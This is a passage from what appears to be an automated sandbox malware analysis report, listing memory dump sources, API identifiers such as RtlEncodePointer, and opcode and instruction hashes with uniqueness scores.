                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: dfa2806a855b11a86b2f5469c5364806f296764fa2a8313dff4af75cb4071a54
                • Instruction ID: 64b2f3dbb70188408027c311bafd1f283b5780df01a8b393b4d89297fa901491
                • Opcode Fuzzy Hash: dfa2806a855b11a86b2f5469c5364806f296764fa2a8313dff4af75cb4071a54
                • Instruction Fuzzy Hash: 2721A77090478A8FDB10DFA9C808BDEBBB0EB0A314F1484AAE449A3652C3386505CF66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 1DD7BE72
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: EncodePointer
                • String ID:
                • API String ID: 2118026453-0
                • Opcode ID: f700763502f1aff0c07200828c21f4cef86b527fee3a168e8f5ba80cea6b6994
                • Instruction ID: 9d12a5cbb5969ce7ddc0ed1a40c9eb6d3e4fa734a6611d2bcfb32d108270412c
                • Opcode Fuzzy Hash: f700763502f1aff0c07200828c21f4cef86b527fee3a168e8f5ba80cea6b6994
                • Instruction Fuzzy Hash: 2311597090074A8FEB10DFA9C84879EBBF4FB05324F148469E509A3711C77965458FA6
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000019.00000002.737970165.000000001DC6D000.00000040.00000001.sdmp, Offset: 1DC6D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29155f34bb7ff509e9546e67bff19ae49e62787c81482954ef1a239bfb166f3c
                • Instruction ID: b35db4128990eda42459a47918951b02dd70926560ca36135ce7e004ed8431f1
                • Opcode Fuzzy Hash: 29155f34bb7ff509e9546e67bff19ae49e62787c81482954ef1a239bfb166f3c
                • Instruction Fuzzy Hash: 7D2136B2504249EFDB01CF48D8C0B56BB65FB84328F208D69E8094B746C376D486CAB2
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000019.00000002.738011451.000000001DC7D000.00000040.00000001.sdmp, Offset: 1DC7D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d507503b8ed30c30eec60123662c76d80196aea3ad0395baaefc9c3b1f1d7a9f
                • Instruction ID: 79899ae7323a5db21b9bda9671b3b0c90ea519f8b8e412d4f9ff71ae7beba2e9
                • Opcode Fuzzy Hash: d507503b8ed30c30eec60123662c76d80196aea3ad0395baaefc9c3b1f1d7a9f
                • Instruction Fuzzy Hash: EA21FF76504348EFDB01CF28D9C4B56BBA5FB84724F20CDA9E8094B346C33AD807CA62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000019.00000002.738011451.000000001DC7D000.00000040.00000001.sdmp, Offset: 1DC7D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c98b467af9db8782998001933f4ba493972875da9f0388f602152c304ec3351
                • Instruction ID: ec6dd513dc40ebc8da82c39a6193015e012c8c2bcfe281ce9adf52b7dc6e020c
                • Opcode Fuzzy Hash: 4c98b467af9db8782998001933f4ba493972875da9f0388f602152c304ec3351
                • Instruction Fuzzy Hash: C5216F76508784DFD702CF24D994B11BF71EB46314F28C9AAD8498B296C33AD85ACB62
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000019.00000002.737970165.000000001DC6D000.00000040.00000001.sdmp, Offset: 1DC6D000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e0ed30b94768c72e950e72b4885edf646e8678239feb31375ccb2b45c20f757
                • Instruction ID: 2a909dd234c6c6c6f457f5c8adb7e32ddb7795ffb2b98f8871327a71ee0c46b8
                • Opcode Fuzzy Hash: 3e0ed30b94768c72e950e72b4885edf646e8678239feb31375ccb2b45c20f757
                • Instruction Fuzzy Hash: 4411D3B6404285CFDB02CF14D9C0B16BF72FB84324F24CAA9D8094B756C336D45ACBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions